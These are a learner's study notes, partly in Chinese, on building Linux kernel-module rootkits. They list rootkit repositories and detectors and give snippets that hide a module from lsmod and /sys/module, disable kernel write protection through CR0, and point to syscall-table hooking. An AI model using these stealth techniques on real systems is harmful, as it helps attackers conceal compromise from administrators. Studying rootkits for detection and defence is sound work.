教学篇
系列一
系列二
Linux Rootkits Part 1: Introduction and Workflow
杂项
视频
Linux LKM Rootkit Tutorial | Linux Kernel Module Rootkit | Part 1
Linux LKM Rootkit Tutorial | Linux Kernel Module Rootkit | Part 2
Linux LKM Rootkit Tutorial | Protect Yourself From MALICIOUS LKM with rkhunter & chkrootkit | Part 3
项目
rootkits
- https://github.com/mncoppola/suterusu
- 字节 https://github.com/peaceSh4wn/research-rootkit
- https://github.com/peaceSh4wn/Diamorphine
- https://github.com/peaceSh4wn/Reptile
- https://github.com/peaceSh4wn/vlany
- https://github.com/peaceSh4wn/bdvl
- https://github.com/peaceSh4wn/rootkit
- https://github.com/peaceSh4wn/lkm-rootkit
- 检测rootkits https://github.com/peaceSh4wn/chkrootkit
- 检测rootkits https://github.com/peaceSh4wn/tyton
hids
知识
- 头文件
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/module.h>
- 注册和卸载
module_init(func)
module_exit(func)
- 基本框架
static int __init init() {
}
static void __exit exit() {
}
MODULE_AUTHOR();
MODULE_LICENSE();
MODULE_DESCRIPTION();
MODULE_VERSION();
module_init(init);
module_exit(exit);
https://blog.csdn.net/whatday/article/details/96986296
https://xcellerator.github.io/posts/linux_rootkits_02/
lsmod
中隐藏
#include <linux/list.h>
static inline list_del_init(struct list_head *entry);
// 在__init中调用
list_del_init(&__this_module.list);
sys/module
中隐藏
#include <linux/module.h>
module结构体
->module_kobject结构体
-> kobject结构体
-> module结构体
-> ...
struct module_kobject {
struct kobject kobj;
struct module *mod;
};
// module.h中
extern struct module __this_module;
#define THIS_MODULE (&__this_module)
// kobject.h中
extern void kobject_del(struct kobject *kobj);
// __init中调用
kobject_del(&THIS_MODULE->mkobj.kobj)
disable_protection
void
disable_protection(void) {
unsigned long cr0 = read_cr0();
clear_bit(16, &cr0);
write_cr0(cr0);
}
void
enable_protection(void) {
unsigned long cr0 = read_cr0();
set_bit(16, &cr0);
write_cr0(cr0);
}
struct kobject是组成设备模型的结构体
ftrace refs:
https://blog.csdn.net/sganchang/article/details/91374486
https://blog.csdn.net/dog250/article/details/84667690
https://blog.csdn.net/pwl999/article/details/107426138
https://xz.aliyun.com/t/2948
https://www.apriorit.com/dev-blog/546-hooking-linux-functions-2
https://hackmd.io/@hankluo6/hideproc
https://hackmd.io/@hankluo6
suterusu
能用的
- 自身隐藏
- 进程隐藏
- 端口隐藏
不好使的
- 文件隐藏
未实现的
- 目录隐藏
https://www.j0s1ph.com/?p=5940
通用结构体&API
侵入式链表 struct list_head
struct seq_file
struct dir_context
list_for_each_entry
list_add
list_del
set_bit (long nr, volatile unsigned long addr);
clear_bit (long nr, volatile unsigned long addr);
dev_get_flags
proc_filldir
root_filldir
proc_iterate
root_iterate
simple_strtol
copy_from_user
cap_set_full
commit_creds
kfree
kmalloc
DEFINE_SPINLOCK(spinlock);
spin_lock_irqsave
spin_unlock_irqrestore
为什么要转为16进制?
hijack_start 注册hook
hijack_pause hook动作,后面会跟自己的动作
hijack_resume 放回原来的动作
hijack_stop 卸载hook
disable_wp
restore_wp
kallsyms_on_each_symbol
arm_write_hook
task_struct
https://www.jianshu.com/p/691d02380312
mm_segment
https://docs.huihoo.com/doxygen/linux/kernel/3.7/structmmsegmentt.html
rootkit
https://docs-conquer-the-universe.readthedocs.io/zh_CN/latest/linux_rootkit/sys_call_table.html
source codes
https://github.com/peaceSh4wn/research-rootkit/tree/master/1-sys_call_table
how to find syscall_table(入门很平滑,舒适)
https://infosecwriteups.com/linux-kernel-module-rootkit-syscall-table-hijacking-8f1bc0bd099c
- 这篇文章里的set_fs和get_fs编译出错,有可能是笔误
需要保持专注啊